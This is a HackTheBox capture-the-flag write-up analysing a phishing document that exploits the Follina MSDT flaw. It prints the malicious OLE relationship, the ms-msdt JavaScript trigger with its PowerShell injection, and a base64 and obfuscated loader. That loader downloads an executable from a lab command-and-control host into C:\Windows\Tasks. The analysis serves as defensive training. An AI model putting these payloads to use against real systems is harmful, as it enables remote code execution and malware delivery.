$ cat writeup.md…
$ cat writeup.md…
HackTheBox
Our SOC has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious doc
Our SOC has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious document. Take a look and figure out what's going on.
This challenge involves analyzing a malicious Office document that exploits CVE-2022-30190 (Follina vulnerability). The attack chain:
.doc filems-msdt:/ protocol handler to execute PowerShellSince DNS no longer resolves, use Host header to access the server directly:
curl -H "Host: diagnostic.htb" http://94.237.59.242:45434/layoffs.doc -o layoffs.doc
file layoffs.doc # Output: Zip archive data, at least v2.0 to extract
The .doc extension is misleading - this is actually a DOCX file (Office Open XML format, which is a ZIP archive).
unzip layoffs.doc -d extracted/
Directory structure:
extracted/
├── [Content_Types].xml
├── _rels/
├── docProps/
└── word/
├── document.xml
├── _rels/
│ └── document.xml.rels
└── ...
In word/document.xml, found an OLEObject with suspicious attributes:
Type="Link" - External referenceProgID="htmlfile" - Will be handled by HTML handlerrId996In word/_rels/document.xml.rels:
<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://diagnostic.htb/223_index_style_fancy.html!" TargetMode="External"/>
Key indicator: External OLE object pointing to HTML file - classic Follina setup.
curl -H "Host: diagnostic.htb" http://94.237.59.242:45434/223_index_style_fancy.html -o payload.html
The HTML contains JavaScript that triggers the MSDT protocol handler:
<script> location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JHtmYGlsZX0gPSAo...base64...'))))))...\""; </script>
This exploits CVE-2022-30190 (Follina):
ms-msdt:/ protocol to invoke Microsoft Support Diagnostic ToolIT_BrowseForFile parameter$() syntax allows command execution within the diagnostic contextecho 'JHtmYGlsZX0gPSAoIns3fXsxfXs2fXs4fXs1fXszfXsyfXs0fXswfSItZid9LmV4ZScsJ0J7bXNEdF80c19BX3ByMCcsJ0UnLCdyLi4ucycsJzNNc19iNEQnLCdsMycsJ3RvQycsJ0hUJywnMGxfaDRuRCcpCiYoInsxfXsyfXswfXszfSItZid1ZXMnLCdJbnZva2UnLCctV2ViUmVxJywndCcpICgiezJ9ezh9ezB9ezR9ezZ9ezV9ezN9ezF9ezd9Ii1mICc6Ly9hdScsJy5odGIvMicsJ2gnLCdpYycsJ3RvJywnYWdub3N0JywnbWF0aW9uLmRpJywnL24uZXhlJywndHRwcycpIC1PdXRGaWxlICJDOlxXaW5kb3dzXFRhc2tzXCRmaWxlIgomKCgoIns1fXs2fXsyfXs4fXswfXszfXs3fXs0fXsxfSIgLWYnTDlGVGFza3NMOUYnLCdpbGUnLCdvdycsJ0wnLCdmJywnQzonLCdMOUZMOUZXaW5kJywnOUZrekgnLCdzTDlGJykpICAtQ1JlcGxBY2Una3pIJyxbY2hBcl0zNiAtQ1JlcGxBY2UoW2NoQXJdNzYrW2NoQXJdNTcrW2NoQXJdNzApLFtjaEFyXTkyKQo=' | base64 -d
Decoded (obfuscated PowerShell):
${f`ile} = ("{7}{1}{6}{8}{5}{3}{2}{4}{0}"-f'}.exe','B{REDACTED','E','r...s','3Ms_b4D','l3','toC','HT','0l_h4nD') &("{1}{2}{0}{3}"-f'ues','Invoke','-WebReq','t') ("{2}{8}{0}{4}{6}{5}{3}{1}{7}"-f '://au','.htb/2','h','ic','to','agnost','mation.di','/n.exe','ttps') -OutFile "C:\Windows\Tasks\$file" &((("{5}{6}{2}{8}{0}{3}{7}{4}{1}" -f'L9FTasksL9F','ile','ow','L','f','C:','L9FL9FWind','9FkzH','sL9F')) -CReplAce'kzH',[chAr]36 -CReplAce([chAr]76+[chAr]57+[chAr]70),[chAr]92)
PowerShell's -f operator reorders string fragments by index. Using Python to reconstruct:
# Filename reconstruction parts = ['}.exe', 'B{REDACTED', 'E', 'r...s', '3Ms_b4D', 'l3', 'toC', 'HT', '0l_h4nD'] order = [7, 1, 6, 8, 5, 3, 2, 4, 0] filename = ''.join(parts[i] for i in order) # Result: HTB{REDACTED}.exe # URL reconstruction parts2 = ['://au', '.htb/2', 'h', 'ic', 'to', 'agnost', 'mation.di', '/n.exe', 'ttps'] order2 = [2, 8, 0, 4, 6, 5, 3, 1, 7] url = ''.join(parts2[i] for i in order2) # Result: https://automation.diagnostic.htb/2/n.exe
Deobfuscated payload behavior:
$file to HTB{REDACTED}.exehttps://automation.diagnostic.htb/2/n.exeC:\Windows\Tasks\<filename>The flag was hidden in the malware filename!
Phishing Email
↓
layoffs.doc (DOCX with external OLE reference)
↓
223_index_style_fancy.html (JavaScript redirect)
↓
ms-msdt:/ protocol handler (CVE-2022-30190)
↓
PowerShell execution (base64 + format string obfuscation)
↓
Download & execute malware from C2 server
$ cat /etc/motd
Liked this one?
Pro unlocks every complete writeup and expanded API access. $9/mo.
$ cat pricing.md$ grep --similar